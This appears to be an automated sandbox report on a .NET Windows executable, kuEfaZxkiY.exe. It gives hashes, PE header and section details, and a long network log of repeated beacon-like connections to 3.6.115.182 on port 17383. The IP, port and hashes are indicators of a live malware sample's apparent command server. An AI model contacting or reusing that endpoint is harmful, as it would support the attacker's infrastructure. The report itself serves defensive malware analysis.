TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: kuEfaZxkiY.exe
File size: 97'792 bytes
MD5: 117eef8a227e6ce3646718d0ed6fb7b1
SHA1: db6e21bf637604aa0be4f73142a1b7447cc83553
SHA256: 80488bf5f30ea2398ff207b9045a0e230aff2d052ea56156a0e96b57784dc0e5
SHA512: b889b1b965251c74776d3f8981f042f6364157d3c3049e59ad3fbd12dc5d95b938db37870b2bb0de6781e7ee48c0a6cf80318b31b60b6df2be96241a34d478a1
SSDEEP: 1536:Fqsgaq+A/lbG6jejoigIP43Ywzi0Zb78ivombfexv0ujXyyed2z3teulgS6pQl:DfZeYP+zi0ZbYe1g0ujyzdfQ
TLSH: B0A35D2067AC9F19EAFD1B74B4B2012043F1E08A9091FB4B4DC154E71FA7B865957EF2
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........>.... ........@.. ....................................@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x41933e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x192e8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0x4de | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x17344 | 0x17400 | 38e22ac8e4d3010d0b39c201a2c0ce18 | False | 0.4487567204301075 | data | 6.015291136298434 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x1a000 | 0x4de | 0x600 | e3145af1e7dfa1e41fe7799ae002b612 | False | 0.3756510416666667 | data | 3.723940100220831 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1c000 | 0xc | 0x200 | 89ebbf373068a00e5c68d2ac72a26374 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x1a0a0 | 0x254 | data | | | 0.4597315436241611
RT_MANIFEST | 0x1a2f4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 17, 2024 20:42:01.792113066 CET | 49729 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:02.070998907 CET | 17383 | 49729 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:02.071491003 CET | 49729 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:02.091609955 CET | 49729 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:02.354696989 CET | 17383 | 49729 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:02.355135918 CET | 49729 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:02.366194010 CET | 49729 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:02.367120028 CET | 49730 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:02.370184898 CET | 17383 | 49729 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:02.633975029 CET | 17383 | 49729 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:02.644026995 CET | 17383 | 49730 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:02.644282103 CET | 49730 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:02.644577026 CET | 49730 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:02.644800901 CET | 17383 | 49729 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:02.921449900 CET | 17383 | 49730 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:02.925757885 CET | 17383 | 49730 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:02.925976038 CET | 49730 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:02.926309109 CET | 49730 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:03.204368114 CET | 17383 | 49730 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:07.951719046 CET | 49731 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:08.228625059 CET | 17383 | 49731 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:08.228920937 CET | 49731 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:08.229341984 CET | 49731 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:08.507121086 CET | 17383 | 49731 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:08.507185936 CET | 17383 | 49731 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:08.507227898 CET | 17383 | 49731 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:08.508773088 CET | 49732 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:08.786103010 CET | 17383 | 49732 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:08.786590099 CET | 49732 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:08.787210941 CET | 49732 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:09.063839912 CET | 17383 | 49732 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:09.063874006 CET | 17383 | 49732 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:09.063890934 CET | 17383 | 49732 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:09.064066887 CET | 49732 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:09.065391064 CET | 49732 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:09.345135927 CET | 17383 | 49732 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:09.346069098 CET | 17383 | 49732 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:14.076436996 CET | 49733 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:14.347162962 CET | 17383 | 49733 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:14.347407103 CET | 49733 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:14.347752094 CET | 49733 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:14.618899107 CET | 17383 | 49733 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:14.618962049 CET | 17383 | 49733 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:14.618987083 CET | 17383 | 49733 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:14.620450974 CET | 49734 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:14.897140026 CET | 17383 | 49734 | 3.6.115.182 | 192.168.2.4
Feb 17, 2024 20:42:14.897476912 CET | 49734 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:14.897855997 CET | 49734 | 17383 | 192.168.2.4 | 3.6.115.182
Feb 17, 2024 20:42:15.174422026 CET | 17383 | 49734 | 3.6.115.182 | 192.168.2.4
                                  Feb 17, 2024 20:42:15.174482107 CET17383497343.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:15.174520016 CET17383497343.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:15.174587965 CET4973417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:15.174747944 CET4973417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:15.451549053 CET17383497343.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:15.451616049 CET17383497343.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:20.185735941 CET4973817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:20.462649107 CET17383497383.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:20.462809086 CET4973817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:20.463119030 CET4973817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:20.739754915 CET17383497383.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:20.739814043 CET17383497383.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:20.739851952 CET17383497383.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:20.741075993 CET4974017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:21.012978077 CET17383497403.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:21.013071060 CET4974017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:21.013288975 CET4974017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:21.286633968 CET17383497403.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:21.286698103 CET17383497403.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:21.286736965 CET17383497403.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:26.310903072 CET4974217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:26.587691069 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:26.587932110 CET4974217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:26.588409901 CET4974217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:26.865295887 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:26.865360975 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:26.865381002 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:26.865678072 CET4974217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:26.865905046 CET4974217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:27.144587994 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:27.144650936 CET17383497423.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:31.872966051 CET4974317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:32.146126986 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:32.146363974 CET4974317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:32.146611929 CET4974317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:32.419807911 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:32.419871092 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:32.419908047 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:32.420025110 CET4974317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:32.420243025 CET4974317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:32.692466974 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:32.692518950 CET17383497433.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:37.435472965 CET4974417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:37.715094090 CET17383497443.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:37.715399981 CET4974417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:37.716052055 CET4974417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:37.994910002 CET17383497443.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:37.994970083 CET17383497443.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:37.994997978 CET17383497443.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:37.997251987 CET4974517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:38.276055098 CET17383497453.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:38.276313066 CET4974517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:38.276479006 CET4974517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:38.554795027 CET17383497453.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:38.554833889 CET17383497453.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:38.554867983 CET17383497453.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:43.562434912 CET4974617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:43.835509062 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:43.836189985 CET4974617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:43.836918116 CET4974617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:44.109375954 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:44.109451056 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:44.109539986 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:44.109817028 CET4974617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:44.109940052 CET4974617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:44.382559061 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:44.382622957 CET17383497463.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.123548031 CET4974717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:49.398596048 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.399146080 CET4974717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:49.401427984 CET4974717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:49.674555063 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.674624920 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.674864054 CET4974717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:49.675272942 CET4974717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:49.676204920 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.949655056 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:49.949717045 CET17383497473.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:54.686002016 CET4974817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:54.958385944 CET17383497483.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:54.958889961 CET4974817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:54.959295988 CET4974817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:55.231556892 CET17383497483.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.231612921 CET17383497483.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.231625080 CET17383497483.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.233160973 CET4974917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:55.506181002 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.506422997 CET4974917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:55.506906986 CET4974917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:55.780055046 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.780111074 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.780138016 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:55.780400038 CET4974917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:55.780726910 CET4974917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:42:56.053250074 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:42:56.053297997 CET17383497493.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:00.794926882 CET4975117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.065777063 CET17383497513.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.065980911 CET4975117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.066286087 CET4975117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.339160919 CET17383497513.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.339219093 CET17383497513.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.339241982 CET17383497513.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.340784073 CET4975217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.614892960 CET17383497523.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.615166903 CET4975217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.615818977 CET4975217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:01.890714884 CET17383497523.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.893192053 CET17383497523.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:01.893249989 CET17383497523.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:06.935445070 CET4975317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:07.214459896 CET17383497533.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:07.214793921 CET4975317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:07.494191885 CET17383497533.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:07.494225025 CET17383497533.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:07.494509935 CET4975317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:08.468148947 CET4975317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:08.468492031 CET4975317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:08.748471975 CET17383497533.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:08.748501062 CET17383497533.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:13.484968901 CET4975417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:13.755852938 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:13.756177902 CET4975417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:13.756833076 CET4975417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:14.027251005 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:14.027317047 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:14.027431965 CET4975417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:14.027812958 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:14.028069019 CET4975417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:14.298269033 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:14.299401999 CET17383497543.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.047694921 CET4975517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:19.328527927 CET17383497553.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.328808069 CET4975517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:19.329188108 CET4975517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:19.610318899 CET17383497553.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.610388994 CET17383497553.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.610431910 CET17383497553.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.612095118 CET4975617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:19.890917063 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:19.891068935 CET4975617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:19.891447067 CET4975617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:20.171693087 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:20.171758890 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:20.171798944 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:20.171956062 CET4975617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:20.172702074 CET4975617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:20.450563908 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:20.450958014 CET17383497563.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:25.185410976 CET4975717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:25.458693981 CET17383497573.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:25.458925009 CET4975717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:25.459287882 CET4975717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:25.731739044 CET17383497573.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:25.734400988 CET17383497573.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:25.734436989 CET17383497573.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:25.735761881 CET4975817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:26.006771088 CET17383497583.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:26.007006884 CET4975817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:26.007471085 CET4975817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:26.278208017 CET17383497583.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:26.278904915 CET17383497583.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:26.278933048 CET17383497583.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:31.296818018 CET4975917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:31.574023008 CET17383497593.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:31.574271917 CET4975917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:31.574500084 CET4975917383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:31.851898909 CET17383497593.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:31.851927996 CET17383497593.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:31.851941109 CET17383497593.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:31.853226900 CET4976017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:32.125861883 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:32.126019955 CET4976017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:32.126351118 CET4976017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:32.400147915 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:32.400167942 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:32.400180101 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:32.400357008 CET4976017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:32.400504112 CET4976017383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:32.672883987 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:32.672900915 CET17383497603.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:37.404107094 CET4976117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:37.680509090 CET17383497613.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:37.680723906 CET4976117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:37.681013107 CET4976117383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:37.958142996 CET17383497613.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:37.958267927 CET17383497613.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:37.958287954 CET17383497613.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:37.959394932 CET4976217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:38.235636950 CET17383497623.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:38.235759974 CET4976217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:38.236052036 CET4976217383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:38.512255907 CET17383497623.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:38.512295008 CET17383497623.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:38.512330055 CET17383497623.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:43.529036999 CET4976317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:43.801767111 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:43.801990986 CET4976317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:43.802356005 CET4976317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:44.074451923 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:44.074481964 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:44.074532032 CET17383497633.6.115.182192.168.2.4
